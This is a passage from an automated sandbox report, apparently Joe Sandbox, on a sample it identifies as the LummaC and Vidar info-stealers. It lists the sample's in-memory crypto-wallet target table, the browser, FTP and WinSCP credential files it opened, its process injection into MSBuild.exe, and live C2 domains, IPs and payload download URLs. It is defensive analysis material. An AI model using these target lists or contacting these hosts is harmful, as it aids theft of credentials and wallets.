Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: MSBuild.exe, 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Tries to harvest and steal Bitcoin Wallet information
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                          Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                          Tries to harvest and steal browser information (history, passwords, etc)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                          Tries to harvest and steal ftp login credentials
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                          Tries to steal Crypto Currency Wallets
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                          Source: Yara matchFile source: 00000004.00000002.2190030987.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Yara detected LummaC Stealer
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.638ad8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.610000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1510351373.0000000000638000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 3636, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3832, type: MEMORYSTR
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA70C40 sqlite3_bind_zeroblob,4_2_6CA70C40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6CA70D60 sqlite3_bind_parameter_name,4_2_6CA70D60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_6C998EA0 sqlite3_clear_bindings,4_2_6C998EA0

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                          Windows Management Instrumentation                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Deobfuscate/Decode Files or Information                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services1
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts1
                          Native API                          		Boot or Logon Initialization Scripts511
                          Process Injection                          		3
                          Obfuscated Files or Information                          		1
                          Credentials in Registry                          		1
                          Account Discovery                          		Remote Desktop Protocol4
                          Data from Local System                          		21
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter                          		Logon Script (Windows)Logon Script (Windows)1
                          Software Packing                          		Security Account Manager4
                          File and Directory Discovery                          		SMB/Windows Admin Shares1
                          Screen Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          PowerShell                          		Login HookLogin Hook1
                          DLL Side-Loading                          		NTDS55
                          System Information Discovery                          		Distributed Component Object ModelInput Capture124
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Masquerading                          		LSA Secrets161
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                          Virtualization/Sandbox Evasion                          		Cached Domain Credentials2
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items511
                          Process Injection                          		DCSync12
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524997 Sample: file.exe Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 54 treatynreit.site 2->54 56 steamcommunity.com 2->56 58 14 other IPs or domains 2->58 68 Suricata IDS alerts for network traffic 2->68 70 Found malware configuration 2->70 72 Antivirus detection for URL or domain 2->72 74 14 other signatures 2->74 9 file.exe 2->9         started        signatures3 process4 signatures5 84 Writes to foreign memory regions 9->84 86 Allocates memory in foreign processes 9->86 88 Injects a PE file into a foreign processes 9->88 12 MSBuild.exe 1 216 9->12         started        17 MSBuild.exe 9->17         started        19 WerFault.exe 19 16 9->19         started        21 MSBuild.exe 9->21         started        process6 dnsIp7 60 cowod.hopto.org 45.132.206.251, 56268, 80 LIFELINK-ASRU Russian Federation 12->60 62 49.12.197.9, 443, 49713, 49714 HETZNER-ASDE Germany 12->62 64 2 other IPs or domains 12->64 42 C:\Users\user\AppData\...\a43486128347[1].exe, PE32 12->42 dropped 44 C:\ProgramData\softokn3.dll, PE32 12->44 dropped 46 C:\ProgramData\nss3.dll, PE32 12->46 dropped 50 5 other files (3 malicious) 12->50 dropped 90 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->90 92 Found many strings related to Crypto-Wallets (likely being stolen) 12->92 94 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->94 100 4 other signatures 12->100 23 CBFCFBFBFB.exe 12->23         started        26 cmd.exe 1 12->26         started        96 Contains functionality to inject code into remote processes 17->96 98 Searches for specific processes (likely to inject) 17->98 48 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->48 dropped file8 signatures9 process10 signatures11 76 Machine Learning detection for dropped file 23->76 78 Writes to foreign memory regions 23->78 80 Allocates memory in foreign processes 23->80 82 Injects a PE file into a foreign processes 23->82 28 MSBuild.exe 23->28         started        31 WerFault.exe 22 16 23->31         started        34 MSBuild.exe 23->34         started        36 MSBuild.exe 23->36         started        38 conhost.exe 26->38         started        40 timeout.exe 1 26->40         started        process12 dnsIp13 66 advocachark.store 172.67.166.76, 443, 56266 CLOUDFLARENETUS United States 28->66 52 C:\ProgramData\Microsoft\...\Report.wer, Unicode 31->52 dropped file14

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\a43486128347[1].exe100%Joe Sandbox ML
                          C:\ProgramData\CBFCFBFBFB.exe100%Joe Sandbox ML
                          C:\ProgramData\freebl3.dll0%ReversingLabs
                          C:\ProgramData\mozglue.dll0%ReversingLabs
                          C:\ProgramData\msvcp140.dll0%ReversingLabs
                          C:\ProgramData\nss3.dll0%ReversingLabs
                          C:\ProgramData\softokn3.dll0%ReversingLabs
                          C:\ProgramData\vcruntime140.dll0%ReversingLabs

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                          https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
                          http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a0%URL Reputationsafe
                          https://steam.tv/0%URL Reputationsafe
                          https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
                          https://mozilla.org0/0%URL Reputationsafe
                          http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://store.steampowered.com/points/shop/0%URL Reputationsafe
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                          https://www.ecosia.org/newtab/0%URL Reputationsafe
                          https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
                          https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
                          https://checkout.steampowered.com/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
                          https://store.steampowered.com/about/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
                          https://help.steampowered.com/en/0%URL Reputationsafe
                          https://store.steampowered.com/news/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/0%URL Reputationsafe
                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                          http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
                          https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          bg.microsoft.map.fastly.net
                          		199.232.210.172
                          		truefalse
                            		unknown
                            steamcommunity.com
                            		104.102.49.254
                            		truetrue
                              		unknown
                              playd.healthnlife.pk
                              		147.45.44.104
                              		truefalse
                                		unknown
                                cowod.hopto.org
                                		45.132.206.251
                                		truetrue
                                  		unknown
                                  fp2e7a.wpc.phicdn.net
                                  		192.229.221.95
                                  		truefalse
                                    		unknown
                                    advocachark.store
                                    		172.67.166.76
                                    		truetrue
                                      		unknown
                                      treatynreit.site
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        241.42.69.40.in-addr.arpa
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          mysterisop.site
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            chorusarorp.site
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              snarlypagowo.site
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                questionsmw.store
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  absorptioniw.site
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    abnomalrkmu.site
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown
                                                      soldiefieop.site
                                                      		unknown
                                                      		unknowntrue
                                                        		unknown

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://49.12.197.9/true
                                                          		unknown
                                                          https://advocachark.store/apitrue
                                                            		unknown
                                                            abnomalrkmu.sitetrue
                                                              		unknown
                                                              https://49.12.197.9/freebl3.dlltrue
                                                                		unknown
                                                                https://49.12.197.9/sqlp.dlltrue
                                                                  		unknown
                                                                  http://playd.healthnlife.pk/ldms/a43486128347.exefalse
                                                                    		unknown
                                                                    https://49.12.197.9/softokn3.dlltrue
                                                                      		unknown
                                                                      absorptioniw.sitetrue
                                                                        		unknown
                                                                        treatynreit.sitetrue
                                                                          		unknown
                                                                          https://steamcommunity.com/profiles/76561199724331900true
                                                                          • URL Reputation: malware
                                                                          		unknown
                                                                          questionsmw.stortrue
                                                                            		unknown
                                                                            https://49.12.197.9/vcruntime140.dlltrue
                                                                              		unknown
                                                                              https://49.12.197.9/nss3.dlltrue
                                                                                		unknown
                                                                                https://49.12.197.9/mozglue.dlltrue
                                                                                  		unknown

                                                                                  URLs from Memory and Binaries

                                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                                  https://duckduckgo.com/chrome_newtabHCAEHD.4.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://advocachark.store/api;$~(9MSBuild.exe, 00000010.00000002.2176459575.0000000001351000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://duckduckgo.com/ac/?q=HCAEHD.4.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://cowod.hopto.CAEBAKMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                        		unknown
                                                                                        https://49.12.197.9/nss3.dllrsg47MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://steamcommunity.com/?subsection=broadcastsMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                            		unknown
                                                                                            http://cowod.hopto.orgMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://49.12.197.9//wMSBuild.exe, 00000004.00000002.2190969803.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://store.steampowered.com/subscriber_agreement/MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://www.gstatic.cn/recaptcha/MSBuild.exe, 00000010.00000002.2176459575.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6MSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.2176459575.000000000132C000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://steamcommunity.com/profiles/76561199780418869/badgesMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                  		unknown
                                                                                                  http://www.valvesoftware.com/legal.htmMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://playd.healthnlife.pk/ldms/a43486128347.exeJMSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngMSBuild.exe, 00000004.00000002.2190030987.000000000046B000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.2190969803.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.4.drfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
